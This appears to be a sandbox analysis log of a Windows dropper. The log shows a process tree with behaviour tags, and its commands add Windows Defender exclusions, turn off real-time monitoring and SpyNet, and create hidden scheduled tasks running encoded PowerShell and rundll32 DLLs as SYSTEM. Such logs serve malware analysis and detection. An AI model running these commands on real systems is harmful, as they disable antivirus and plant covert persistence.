PID 1204 wrote to memory of 964	1204	forfiles.exe	cmd.exe
PID 1204 wrote to memory of 964	1204	forfiles.exe	cmd.exe
PID 964 wrote to memory of 1572	964	cmd.exe	reg.exe
PID 964 wrote to memory of 1572	964	cmd.exe	reg.exe
PID 964 wrote to memory of 1572	964	cmd.exe	reg.exe
PID 964 wrote to memory of 1572	964	cmd.exe	reg.exe
PID 964 wrote to memory of 1572	964	cmd.exe	reg.exe
PID 964 wrote to memory of 1572	964	cmd.exe	reg.exe
PID 964 wrote to memory of 1572	964	cmd.exe	reg.exe
PID 360 wrote to memory of 744	360	cmd.exe	reg.exe
PID 360 wrote to memory of 744	360	cmd.exe	reg.exe
PID 360 wrote to memory of 744	360	cmd.exe	reg.exe
PID 360 wrote to memory of 744	360	cmd.exe	reg.exe
PID 360 wrote to memory of 744	360	cmd.exe	reg.exe
PID 360 wrote to memory of 744	360	cmd.exe	reg.exe
PID 360 wrote to memory of 744	360	cmd.exe	reg.exe
PID 360 wrote to memory of 676	360	cmd.exe	reg.exe
PID 360 wrote to memory of 676	360	cmd.exe	reg.exe
PID 360 wrote to memory of 676	360	cmd.exe	reg.exe
PID 360 wrote to memory of 676	360	cmd.exe	reg.exe
PID 360 wrote to memory of 676	360	cmd.exe	reg.exe
PID 360 wrote to memory of 676	360	cmd.exe	reg.exe
PID 360 wrote to memory of 676	360	cmd.exe	reg.exe
PID 964 wrote to memory of 1984	964	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1768

C:\Users\Admin\AppData\Local\Temp\7zSF94E.tmp\Install.exe
.\Install.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1692

C:\Users\Admin\AppData\Local\Temp\7zSFE5C.tmp\Install.exe
.\Install.exe /S /site_id "525403"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:836

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:548

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:360

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
6⤵
PID:744

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
6⤵
PID:676

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:1204

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:964

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
6⤵
PID:1572

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
6⤵
PID:1984

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gARrCaNGj" /SC once /ST 01:30:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
4⤵
- Creates scheduled task(s)
PID:2008

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gARrCaNGj"
4⤵
PID:816

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gARrCaNGj"
4⤵
PID:1616

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bPisEBnRwoxYOmuHrm" /SC once /ST 13:41:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\UoINOUE.exe\" mF /site_id 525403 /S" /V1 /F
4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1344

C:\Windows\system32\taskeng.exe
taskeng.exe {CAE9D8BE-E142-407A-9793-EE828453A401} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]
1⤵
PID:1832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1652

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1708

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:436

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:828

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1684

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1228

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1612

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1592

C:\Windows\system32\taskeng.exe
taskeng.exe {918EB8B8-CCAF-4722-B614-C1E8AEF076E4} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1104

C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\UoINOUE.exe
C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\UoINOUE.exe mF /site_id 525403 /S
2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:952

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gzihveXcs" /SC once /ST 02:29:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:1276

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gzihveXcs"
3⤵
PID:1204

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gzihveXcs"
3⤵
PID:1736

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
3⤵
PID:1980

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:748

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
3⤵
PID:1576

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1196

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gBYRTufjG" /SC once /ST 05:40:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:268

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gBYRTufjG"
3⤵
PID:888

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gBYRTufjG"
3⤵
PID:1932

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2044

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1908

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1112

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1600

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:32
3⤵
PID:748

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1460

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1520

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1080

C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\LzrOtnkAyuDpOCzW\rpNHsufK\iCGUdadHvoBIcwRo.wsf"
3⤵
PID:1200

C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\LzrOtnkAyuDpOCzW\rpNHsufK\iCGUdadHvoBIcwRo.wsf"
3⤵
- Modifies data under HKEY_USERS
PID:1868

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FHyUItRmbDQJtgsSWlR" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:456

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FHyUItRmbDQJtgsSWlR" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:556

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gUXCkMfuWzCyC" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:964

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gUXCkMfuWzCyC" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:772

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gcyASImYjZBU2" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1160

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gcyASImYjZBU2" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:856

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vCYWhmhlU" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1612

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vCYWhmhlU" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1884

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yqOJJFIvHNUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1192

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yqOJJFIvHNUn" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1932

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\QtEKgGNERTHTknVB" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1736

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\QtEKgGNERTHTknVB" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1112

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:980

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1596

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1940

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:548

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FHyUItRmbDQJtgsSWlR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1984

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FHyUItRmbDQJtgsSWlR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2020

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gUXCkMfuWzCyC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1948

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gUXCkMfuWzCyC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1684

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gcyASImYjZBU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1944

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gcyASImYjZBU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:672

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vCYWhmhlU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:832

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vCYWhmhlU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1052

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yqOJJFIvHNUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:436

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yqOJJFIvHNUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:820

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\QtEKgGNERTHTknVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:748

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\QtEKgGNERTHTknVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1592

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS" /t REG_DWORD /d 0 /reg:32
4⤵
PID:268

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1596

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1344

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:64
4⤵
PID:584

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gFOxOpNWs" /SC once /ST 09:10:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:1916

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gFOxOpNWs"
3⤵
PID:660

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gFOxOpNWs"
3⤵
PID:1192

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
3⤵
PID:436

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
4⤵
PID:2004

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
3⤵
PID:1576

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
4⤵
PID:924

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ehnYTuGzyhWqfGFsn" /SC once /ST 10:02:19 /RU "SYSTEM" /TR "\"C:\Windows\Temp\LzrOtnkAyuDpOCzW\ASUEhtNmEGCZDbi\AvvXMtd.exe\" 4c /site_id 525403 /S" /V1 /F
3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1824

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "ehnYTuGzyhWqfGFsn"
3⤵
PID:1520

C:\Windows\Temp\LzrOtnkAyuDpOCzW\ASUEhtNmEGCZDbi\AvvXMtd.exe
C:\Windows\Temp\LzrOtnkAyuDpOCzW\ASUEhtNmEGCZDbi\AvvXMtd.exe 4c /site_id 525403 /S
2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:268

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bPisEBnRwoxYOmuHrm"
3⤵
PID:2016

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
3⤵
PID:584

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
4⤵
PID:1068

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
3⤵
PID:1464

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
4⤵
PID:1624

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\vCYWhmhlU\ZKzYEQ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ulJHerdNyNJKzGw" /V1 /F
3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2036

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ulJHerdNyNJKzGw2" /F /xml "C:\Program Files (x86)\vCYWhmhlU\RSyOvKC.xml" /RU "SYSTEM"
3⤵
- Creates scheduled task(s)
PID:516

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ulJHerdNyNJKzGw"
3⤵
PID:1000

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ulJHerdNyNJKzGw"
3⤵
PID:560

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "RRtdPhcgeMAKnR" /F /xml "C:\Program Files (x86)\gcyASImYjZBU2\ddGkGad.xml" /RU "SYSTEM"
3⤵
- Creates scheduled task(s)
PID:1524

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "DBZKNiGxmOsGA2" /F /xml "C:\ProgramData\QtEKgGNERTHTknVB\HURAKNX.xml" /RU "SYSTEM"
3⤵
- Creates scheduled task(s)
PID:1740

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "tMaUGjMWirHLUJOBi2" /F /xml "C:\Program Files (x86)\FHyUItRmbDQJtgsSWlR\nSgWAXD.xml" /RU "SYSTEM"
3⤵
- Creates scheduled task(s)
PID:1932

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "YgCwwruigbnUpvnuIqJ2" /F /xml "C:\Program Files (x86)\gUXCkMfuWzCyC\gQCPPMX.xml" /RU "SYSTEM"
3⤵
- Creates scheduled task(s)
PID:2004

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "AFcndnMIJqNXhoPDJ" /SC once /ST 05:43:23 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\LzrOtnkAyuDpOCzW\PNQVubXI\UFnazFZ.dll\",#1 /site_id 525403" /V1 /F
3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1196

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "AFcndnMIJqNXhoPDJ"
3⤵
PID:676

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
3⤵
PID:1552

C:\Windows\SysWOW64\reg.exe
